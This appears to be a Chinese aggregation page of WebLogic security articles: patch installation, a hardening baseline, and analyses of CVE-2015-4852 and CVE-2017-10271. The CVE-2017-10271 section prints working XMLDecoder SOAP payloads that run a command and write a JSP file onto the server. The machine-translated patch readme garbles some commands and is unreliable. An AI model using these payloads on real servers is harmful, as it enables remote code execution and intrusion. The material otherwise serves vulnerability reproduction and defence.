精华内容
下载资源
问答
  • 该工具检测你的应用服务器是否存在漏洞,对漏洞及时的修复,防止不必要的损失
  • Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
  • Weblogic漏洞检测工具

    2018-09-14 15:30:44
    黑客利用漏洞进行批量挖矿,利用漏洞的绕过去批量扫描攻击,该工具检测你的应用服务器是否存在漏洞
  • Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
  • Weblogic XML反序列化漏洞检查工具CVE-2017-10271 影响范围 Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.1.3.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本
  • 好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
  • 好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
  • Linux下WebLogic漏洞补丁包安装过程

    千次阅读 2019-04-02 17:30:22
    找到漏洞对应的补丁包,地址: https://www.oracle.com/technetwork/topics/security/public-vuln-to-advisory-mapping-093627.html 找到对应补丁包之后进入补丁包页面,点击如图绿框,进入到补丁包版本对应页面...

    官网下载补丁包

    找到漏洞对应的补丁包,地址:
    https://www.oracle.com/technetwork/topics/security/public-vuln-to-advisory-mapping-093627.html

    找到对应补丁包之后进入补丁包页面,点击如图绿框,进入到补丁包版本对应页面,选择自己的weblogic版本,进行下载。
    在这里插入图片描述

    下载后的安装过程

    参照readme

    https://updates.oracle.com/Orion/Services/download?type=readme&aru=22540742

    1 零停机修补
    此补丁已标记为符合零停机补丁的条件。
    此修补程序支持的零停机修补类型为FMW_ROLLING_ORACLE_HOME。
    通过零停机修补,可以以某种方式将修补程序应用于系统
    这不会导致任何停机。这确保了系统可以保留
    在修补过程中可用且正常运行。某些
    但是,在应用补丁之前必须满足先决条件。
    有关更多信息,请参阅以下内容:
    Doc ID 1942159.1 Oracle融合中间件/ WebLogic Server的零停机(ZDT)修补简介
    https://support.oracle.com/rs?type=doc&id=1942159.1

    2先决条件

    在安装之前,请确保满足以下要求
    卸载补丁:

    1.了解PSU计划:

    在首次应用PSU之前,请查看以下内容:

    Doc ID 1306505.1补丁集更新(PSU)Oracle管理指南
    WebLogic Server(WLS)
    https://support.oracle.com/rs?type=doc&id=1306505.1

    2.更新Java SE(JDK / JRE):

    对于Oracle JDK和JVM的用户,我们强烈建议您使用最新版本
    Java重要补丁更新(CPU)一发布。参考
    以下是进一步的信息:

    Doc ID 1506916.1获取Oracle融合中间件产品的Java SE(JDK / JRE)
    https://support.oracle.com/rs?type=doc&id=1506916.1

    3.更新OPatch:

    Oracle Fusion Middleware 12.2.1产品随OPatch NextGen 13.3一起安装
    申请临时补丁。OPatch实用程序应该随时更新
    解决已知问题。

    您可以使用以下命令检查您的版本:

    ORACLE_HOME / OPatch / opatch版本

    ***要安装此PSU,您必须使用OPatch版本13.9.4。

    如果您尝试使用早期的opatch版本(例如13.9.2.0.0)安装PSU,
    你会看到类似于的错误:


    验证环境并执行先决条件检查…
    先决条件检查“CheckMinimumOPatchVersion”失败。
    细节是:

    正在使用的OPatch版本为13.9.2.0.0,而以下的补丁程序
    需要更高版本:
    补丁28710939需要OPatch版本13.9.4.0.0。
    请从My Oracle Support下载最新的OPatch。

    *** OPatch 13.9.4可用作补丁28186730:
    https://support.oracle.com/rs?type=patch&id=28186730

    查看以下内容以获取更多OPatch信息:

    Doc ID 1587524.1使用OUI NextGen OPatch 13 for Oracle融合中间件12c(12.1.2+)
    https://support.oracle.com/rs?type=doc&id=1587524.1

    4.更新nginst:
    请确保您拥有NextGen OUI Framework 13.9.3.0.0.1(或更高版本)
    安装。这里有13.9.3.0.0.1补丁:
    https://support.oracle.com/rs?type=patch&id=29137924。
    注意:如果在Windows上安装此修补程序,请包含-oop
    选项

    5.验证OUI清单。
    OPatch需要访问有效的OUI清单才能应用补丁。

    注意:这需要设置ORACLE_HOME(参见“2.安装前说明”部分)
    在运行以下命令之前:

    使用以下命令验证OUI清单:

    $ opatch lsinventory -jre $ ORACLE_HOME / oracle_common / jdk / jre

    注意:
    应使用-jre选项运行所有OPatch命令。
    确保您使用的JDK版本是您产品的认证版本。

    如果命令出错,请联系Oracle支持部门并进行验证
    并在继续之前验证库存设置。

    6.确认可执行文件出现在系统路径中:

    修补过程将使用unzip和OPatch可执行文件。后
    设置ORACLE_HOME环境,确认以下可执行文件
    存在,然后继续下一步:

    • opatch
    • 解压缩

    如果这些可执行文件中的任何一个未显示在PATH中,请更正
    继续之前的问题。

    7.创建用于存储解压缩补丁的位置:

    该位置稍后将在文档中称为PATCH_TOP。

    注意:在WINDOWS上,首选位置是驱动器根目录。
    例如,“C:\ PATCH_TOP”并避免选择像,
    “C:\ Documents and Settings \ username \ PATCH_TOP”。
    由于Windows上有256个字符的限制,这是必要的
    平台。

    3预安装说明

    1.将ORACLE_HOME环境变量设置为已安装ORACLE WEBLOGIC SERVER的目录。

    2.要安装此PSU,您必须使用OPatch版本13.9.4。请参阅上面的先决条件部分。

    4安装说明

    1.将补丁zip文件解压缩到PATCH_TOP中。

    $ unzip -d PATCH_TOP p28710939_122130_Generic.zip

    注意:在WINDOWS上,unzip命令在路径名中有256个字符的限制。
    如果遇到这种情况,请使用7-Zip等备用ZIP实用程序解压缩补丁。

    例如:要使用7-zip解压缩,请运行以下命令:
    “c:\ Program Files \ 7-Zip \ 7z.exe”x p28710939_122130_Generic.zip

    2.将当前目录设置为修补程序所在的目录。

    $ cd PATCH_TOP / 28710939

    3.运行OPatch以应用修补程序。

    $ opatch适用

    视窗:
    在使用OPatch 13.9.4应用临时补丁时,Microsoft Windows平台需要’-oop’选项:

    <ORACLE_HOME> \ OPatch \ opatch apply <PATCH_HOME> -oop

    其中PATCH_HOME是您提取临时补丁内容的编号目录。

    注意:

    当OPatch启动时,它会验证补丁并确保没有补丁
    与已安装在ORACLE_HOME中的软件发生冲突。

    如果发生opatch冲突,您将看到类似于下面提到的警告消息:

    临时补丁XXXX与OH中的补丁[YYYY]冲突…
    冲突补丁:YYYY
    Patch(es)YYYY与当前正在安装的补丁(XXXX)发生冲突。
    如果继续,将回滚补丁YYYY并安装新补丁(XXXX)。

    如果需要合并新修补程序(XXXX)和冲突修补程序(YYYY),请与Oracle支持服务联系并请求合并修补程序。

    你想继续吗?[Y | N]
    ñ

    您必须停止修补程序安装,并应检查以下内容:

    Doc ID 1329952.1 Oracle融合中间件补丁冲突解决方案
    https://support.oracle.com/rs?type=doc&id=1329952.1

    如果无法解决冲突或您需要合并请求,请与Oracle支持部门联系。

    5安装后的说明

    注意:错误26929163的修复程序更新了运行时组件
    RCU和升级助手工具的WLS插件。它会阻止任何
    将来的WLS架构安装或升级,允许WLS架构所有者
    安装或升级完成后,保留任何priv。该
    补丁将影响已安装的模式或
    升级到正确的架构版本。

    对于希望删除任何特权的现有安装
    已分配给WLS架构所有者,用户可以运行该脚本
    位于$ MW_HOME / oracle_common / common / sql / wlsservices / sql / cleanup.sql
    作为DBA用户并提供WLS架构所有者名称。例如,如果
    WLS架构所有者是DEV1_WLS和DEV1_WLS_RUNTIME:

      sqlplus <dba-connect-info> cleanup.sql DEV1_WLS DEV1_WLS_RUNTIME
    

    6卸载说明

    如果在安装此修补程序后遇到任何问题,请将修补程序删除为
    如下:

    1.确保遵循相同的先决条件或预安装步骤(如果有)
    卸载补丁时
    这包括设置任何环境变量,如ORACLE_HOME和
    在卸载之前验证OUI清单。

    2.切换到解压缩补丁的目录。

    $ cd PATCH_TOP / 28710939

    3.运行OPatch以卸载修补程序。

    $ opatch rollback -id 28710939

    7卸载后的说明

    重新启动所有服务器(AdminServer和所有受管服务器)。

    这是重新部署原始应用程序并带来的必要条件
    环境回到原来的状态。

    我下载的是28710309
    需要先更新Opatch 到13.9.4根据readme中的链接进入Opatch下载页,下载zip之后,解压到liunx的文件夹下,cd 进入到Opatch解压目录,进行安装
    安装之后可以使用下列命令:

    1. 查看opatch版本:$ORACLE_HOME/OPatch/opatch version
    2. 执行opatch安装:$ORACLE_HOME/OPatch/opatch apply
    3. 查看opatch安装信息:$ORACLE_HOME/OPatch/opatch

    进入到28710309目录
    执行 $ORACLE_HOME/OPatch/opatch apply
    成功安装:
    在这里插入图片描述

    展开全文
  • CVE-2017-10271漏洞产生的原因是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml...

    一、漏洞描述:
    CVE-2017-10271漏洞产生的原因是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。

    影响版本:10.3.6.0,12.1.3.0.0,12.2.1.1.0

    二、环境搭建
    windows service 2008 R2

    三、漏洞复现
    漏洞检测:

    工具利用 — XML反序列化漏洞检查工具
    脚本利用 — CVE-2017-10271-poc.py
    Burp抓包传入数据验证

    漏洞地址:
    /wls-wsat/CoordinatorPortType
    /wls-wsat/RegistrationPortTypeRPC
    /wls-wsat/ParticipantPortType
    /wls-wsat/RegistrationRequesterPortType
    /wls-wsat/CoordinatorPortType11
    /wls-wsat/RegistrationPortTypeRPC11
    /wls-wsat/ParticipantPortType11
    /wls-wsat/RegistrationRequesterPortType11

    1、在目标环境机调用计算器

    访问:http://yourip:7001/wls-wsat/RegistrationRequesterPortType
    上面漏洞地址效果都一样的
    构造POST数据包,
    将Content-Type修改为:text/xml
    发送数据包,服务器返回的状态码为500。

    利用的poc:

    <soapenv:Envelope     xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
           <work:WorkContext    xmlns:work="http://bea.com/2004/06/soap/workarea/">
               <java      version="1.8" class="java.beans.XMLDecoder">
                   <void     class="java.lang.ProcessBuilder">
                        <array    class="java.lang.String" length="3">
                            <void     index="0">
                               <string>calc</string>
                            </void>
                            <void     index="1">
                                <string></string>
                            </void>
                            <void     index="2">
                                <string> </string>
                            </void>
                        </array>
                    <void     method="start"/></void>
               </java>
           </work:WorkContext>
       </soapenv:Header>
        <soapenv:Body/>
        </soapenv:Envelope>
    

    在这里插入图片描述
    查看靶机(service 2008),可以看到目标机器的计算器已经被调用
    在这里插入图片描述

    2、上传文件的poc

    
    POST //wls-wsat/CoordinatorPortType HTTP/1.1
    Host: yourip:7001
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: ADMINCONSOLESESSION=WvRQdwVJLvRTRvNn1f7lDlHGh9hTgyvFQPGy9YqTQpLymTTL9jnZ!-1021969175
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Type: text/xml
    Content-Length: 648
    
     
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter"> 
        <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/666.jsp</string>
        <void method="println">
    <string>
        <![CDATA[
    <% out.print("8888"); %>
        ]]>
        </string>
        </void>
        <void method="close"/>
        </object></java></java>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
    </soapenv:Envelope>
    
    

    构造post数据包,将Content-Type修改为:text/xml
    发送数据包,服务器返回的状态码为500
    在这里插入图片描述
    访问 :http://your-ip:7001/bea_wls_internal/666.jsp
    在这里插入图片描述

    靶机查看上传的文件地址:servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war

    在这里插入图片描述

    展开全文
  • Weblogic基线检查

    2020-05-15 00:00:00
    账号系统启动账号限制weblogic的启动账号检查方法:ps -ef|grep -i weblogic 要求执行账号不可以是root和nobody,否则不符合安全要求账户锁定策略要求账号...


    账号


    系统启动账号

    限制weblogic的启动账号
    检查方法:

    ps -ef|grep -i weblogic
    

    要求执行账号不可以是root和nobody,否则不符合安全要求

    账户锁定策略

    要求账号在连续登录失败指定次数后,对账号进行锁定
    配置方法:
    以管理员身份登录控制台
    点击左侧导航栏的“安全领域(Security Realms)”
    选择右侧的myrealm
    进入后,选择顶部导航栏的“用户封锁(User Lockout)”

    根据业务需要设置相应的阈值即可

    口令


    密码复杂度

    对于采用静态口令的系统或设备应采用较强的密码
    配置方法:
    在Weblogic的安装目录下,将weblogic.properties文件,将weblogic.system.minPasswordLen的值修改为希望的密码最小长度

    日志

    登录审核

    设备应配置日志功能,对用户登录进行记录,记录内容包括用户登录使用的帐号,登录是否成功,登录时间,以及远程登录时,用户使用的IP地址
    配置方法:
    在WebLogic安装目录下的weblogic.properties配置文件,开启日志,配置按日期rotate

    weblogic.system.enableReverseDNSLookups=true
    

    IP协议


    配置Weblogic支持加密协议

    对于通过HTTP协议进行远程维护的设备,设备应支持使用HTTPS等加密协议
    配置方法:
    在WebLogic安装目录下的weblogic.properties配置文件中进行如下配置

    weblogic.system.SSLListenPort=portNumber
    weblogic.security.certificate.server=mycert.der
    weblogic.security.key.server=mykey.der
    weblogic.security.certificate.authority=CA.der
    weblogic.security.certificateCacheSize=5
    weblogic.security.clientRootCA=anyValidCertificate
    weblogic.httpd.register.authenticated=\weblogic.t3.srvr.ClientAuthenticationServlet
    weblogic.httpd.register.T3AdminCaptureRootCA=admin.T3AdminCaptureRootCA
    SSL Enabled="true"
    

    限制应用服务器Socket数量

    为了防止DOS/DDOS攻击,应设置最大Socket连接数量
    配置方法:

    1. 点击左侧面板的域名文件夹,然后点击Servers文件夹,双击要管理的服务器

    2. 在右侧面板的“Configuration”面板下选择“Tuning”标签,查看Maximum Open Sockets值
      要求Maximum Open Sockets不大于1024

    禁用Send Server Header

    配置方法:
    以管理员身份登录管理控制台

    1. 点击域名下的Servers文件夹,选择要管理的服务器

    2. 在右侧面板“Protocols”面板下,点击HTTP标签

    3. 检查是否勾选Send Server header

    其他安全配置


    更改默认端口

    更改Weblogic默认端口
    配置方法:
    在WebLogic安装目录下的weblogic.properties配置文件中进行如下配置

    weblogic.system.listenPort=integer
    

    错误页面处理

    WebLogic错误页面重定向
    配置方法:
    查看<Application HOME>/WEB-INF/web.xml:进行如下配置:

    目录访问列表限制

    防止发生目录遍历
    配置方法:
    在WebLogic安装目录下的weblogic.properties配置文件中进行如下配置

    weblogic.httpd.indexDirectories=false
    

    书单推荐

    加入我的星球

    下方查看历史文章

    VulnHub之DC-1

    VulnHub之DC-2

    VulnHub之DC-3

    VulnHub之DC-4

    VulnHub之MuzzyBox

    【工具分享】AWVS 12 汉化破解版

    通达OA任意上传&文件包含漏洞复现

    Windows基线检查(一)

    Windows基线检查——剩余信息保护&服务安全

    Linux基线检查

    IIS7.0 基线检查

    Apache 基线检查

    扫描二维码

    获取更多精彩

    NowSec

    展开全文
  • weblogic系列_Java反序列化_CVE-2015-4852 1:概述1.1:官方概述1.2:漏洞概述2:漏洞原理分析2.1:基本概念2.1欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入...


    )

    1:概述

    1.1:官方概述

    The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.

    1.2:漏洞概述

    虽说是weblogic的漏洞但是该漏洞的原理是org.apache.commons.collections组件存在潜在的远程代码执行漏洞,应用的是java的反序列化部分机制的问题。在Java反序列化中,对于传入的序列化数据没有进行安全性检查,将恶意的TransformedMap序列化,可能会导致远程命令执行。

    2:漏洞原理分析

    2.1:基本概念

    什么是commons-collections组件:Java commons-collections是JDK 1.2中的一个主要新增部分。它添加了许多强大的数据结构,可以加速大多数重要Java应用程序的开发。从那时起,它已经成为Java中公认的集合处理标准。
    Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件,Commons Collections被广泛应用于各种Java应用的开发。
    Commons Collections API

    2.2:漏洞代码审计

    2.2.1:反射漏洞利用

    1:这次我们这样去理解这个漏洞吧,我先找了一份网上的POC;大家请看
    在这里插入图片描述
    然后我们跟着这个POC的调用流程,去看看这个漏洞的具体利用吧;

    1.1:首先我们看黄色部分:这里构造了一个Transformer数组,数组中第一个类是ConstantTransformer类对象
    在这里插入图片描述
    该对象的transform方法只是返回Runtime.class对应的“java.lang.Runtime”常量字符串内容;

    然后黄色的第二部分是InvokerTransformer类对象
    在这里插入图片描述
    这个对象的transform方法可以看到下面的整个方法是通过java反射机制
    来进行函数的invoke调用的。

    1.2:接着我们去看蓝色部分的调用,ChainedTransformer类,该类将我们之前构造的Transformer对象连接起来
    在这里插入图片描述
    1.3:接着我们可以看到将实例化的ChainedTransformer对象,被decorate方法包装成TransformedMap类,这个TransformedMap类重写了readObject方法,可以进行反序列化的操作;
    在这里插入图片描述
    在这里插入图片描述
    1.4:下来我们可以看到POC执行到红色部分,我们跟进setValue,发现里面先调用了一个checksetValue方法,然后我们继续跟进checksetValue
    在这里插入图片描述
    我们发现调用了TransformedMap的checksetValue方法,这个方法实际返回了ChainedTransformer的transfom的结果,就是直接调用之前构造的调用链((Runtime)Runtime.class.getMethod(“getRuntime”,null).invoke(null,null).exec(“calc”));
    在这里插入图片描述
    在这里插入图片描述

    2.2.2:反序列化漏洞利用

    序列化定义:序列化是把java对象转换成字节序列的过程;反序列化是把字节序列恢复为java对象的过程。

    漏洞原理:如果java应用没有对传入的序列化数据进行安全性检查,我们可以将恶意的TransformedMap序列化后,远程提交给Java应用,如果java应用可以触发变换,就可以成功进行远程命令执行。

    反序列化原理:反序列化会调用ObjectInputStream类的readObject()方法,如果被反序列化的类重写了readObject(),那么该类在进行反序列化时,java会优先调用重写的readObject()方法。

    综述,结合上面Common Collection的特性,
    1、如果某个可序列化的类重写了readObject()的方法,
    2、并且在readObject()中对Map类型的变量进行了键值修改操作,并且这个Map变量时可控的,就可以实现攻击链的调用。
    通过网上信息,AnnotationInvocationHandler类刚好实现了readObject()方法,这个类readObject()具体实现:
    在这里插入图片描述
    漏洞利用:实例化一个AnnotationInvocationHandler类,将其成员变量memberValues赋值为精心构造的恶意TransformedMap对象。然后将其序列化,提交给未做安全检测的Java应用。Java应用在进行反序列化操作时,则会触发TransformedMap的变换函数,执行预设的命令。readObject方法中的成员变量memberValue为Map<String,Object>
    类型,并且调用memberValue.setValue()的操作,正好可以触发该漏洞。AnnotationInvocationHanler,在触发漏洞时会对type进行检查,所以在transformer的时候我们要将type设置为annotation类型。

    利用过程:POC的执行过程为TransformedMap -> AnnotationInvocationHandler.readObject() -> setValue() -> checkValue() -> transform() 漏洞成功触发,具体的POC为
    在这里插入图片描述
    在这里插入图片描述

    3:漏洞修复

    1:ApacheCommons Collections组件修复:ApacheCommons Collections已经在3.2.2版本中做了修复,对这些不安全的Java类的序列化支持增加开关,默认为关闭状态,涉及的类包括CloneTransformer, ForClosure, InstantiateFactiory,InstantiateTransformer,InvokerTransformer,PrototypeCloneFactory,PrototypeSerialiZationFactory,WhileClosure。

    看一下InvokerTransformer类是如何修改的,该类重写了序列化相关方法的writeObject()和readObject().在序列化和反序列化方法中增加了安全检查,判断当前系统是否允许不安全的序列化。
    在这里插入图片描述
    CheckUnsafeSerialization代码
    在这里插入图片描述
    2:weblogic修复补丁:CVE-2015-4852补丁主要应用在三个位置上,主要是进行黑名单绕过
    在这里插入图片描述

    4 :参考链接

    传送门:WebLogic Java反序列化漏洞终极建议

    链接一

    链接二

    链接三

    链接四

    展开全文
  • weblogic中cmd反序列号漏洞检测,必须要求是java8的环境启动,也可以选择对jboos的漏洞,对安全测评来说,比较重要,可以复现漏洞
  • Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)...Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。Oracle官方在2018年4月18日发布了4月关键补丁更新,其中包...
  • 一、环境需求 1、Windows server 2008 R2虚拟机一台...2、JDK 7(推荐64位)(该漏洞环境只兼容1.7版本的) 3、WebLogic安装包 二、安装JAVA JAVA环境变量设置: JAVA_HOME:C:\Program Files\Java\j...
  • weblogic10.3.6安装漏洞补丁

    千次阅读 2020-08-25 15:35:12
    安装Weblogic第一个补丁集p20780171_1036_Generic.zip更新10.3.6.0.12 1、获取Weblogic版本信息,版本截图信息如下: 2、上传p20780171_1036_Generic.zip到/app目录下 3、使用root用户解压p20780171_1036_...
  • 2017年1月27日,WebLogic 官方发布了一个编号为 CVEID: CVE-2017-3248 的漏洞,影响为 Critical 。之前轰动一时的反序列化漏洞,官方当时的修补措施,在本漏洞中可被绕过。此次漏洞影响 WebLogic 版本如下图所示:...
  • 前几天用户的服务器中检查到了Weblogic2628l漏洞,并且打过Oracle官方补丁后还是能检测到。 针对此问题,去网上查找了一些资料。做了一些总结和测试,一共有四种解决此漏洞的方法: 1、禁止使用Weblogic的T3协议。...
  • 检查项目 任意命令执行 漏洞级别 高危 ... 存在任意命令执行漏洞 ... 探测到使用weblogic,使用weblogic已知漏洞进行攻击 远程命令执行成功,权限为desktop-6qk...
  • WebLogic WLS组件漏洞检验和复现
  • CNCERT前几天发公告称发现Oracle公司出品的基于JavaEE结构的中间件WebLogic产品存在一个远程上传漏洞,并得到了厂商的确认,危害程度评分高达9.8分。鉴于厂商已进行了安全修复,笔者对该漏洞进行了一次分析。...
  • WebLogic Java反序列化漏洞终极建议

    万次阅读 2018-09-25 13:01:56
    title: WebLogic Java反序列化漏洞终极建议 author: rocklei123 tags: Java WebLogic categories: Spring date: 2018-09-25 09:27:33 0. 概述: 本文针对这几年来WebLogic软件经常报出的java反序列化漏洞问题进行...
  • Weblogic 反序列化漏洞历史 0x00 weblogic简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用...
  • 日常运维工作中我们有时需要给weblogic打补丁,补丁文件是oracle官方发布的zip包。下面均为我本地的目录结构,实际操作中以你实际的目录为准。 1、上传补丁并解压 cd /picclife/software/psu -----指定一个存放的...
  • Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令、getshell等危害。 影响版本:Webl...
  • CVE-2017-10271漏洞产生的原因是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的...
  • 0x01 Weblogic简介 1.1 叙述 Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用...
  • WebLogic LDAP远程代码执行漏洞 漏洞编号 CVE-2021-2109 JNDI简介 JNDI是Java Naming and Directory Interface (Java命名和目录接口)的英文简写, 是为Java应用程序提供命名和目录访问服务的API ...
  • 针对这几年来WebLogic软件经常报出的java反序列化漏洞问题,因为weblogic底层也使用Apache Commons Collections库,WebLogic 存在Java反序列化漏洞无疑的,在漏洞修复这方面,Oracle可是很不走心,每个季度更新补丁...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,702
精华内容 680
关键字:

weblogic漏洞检查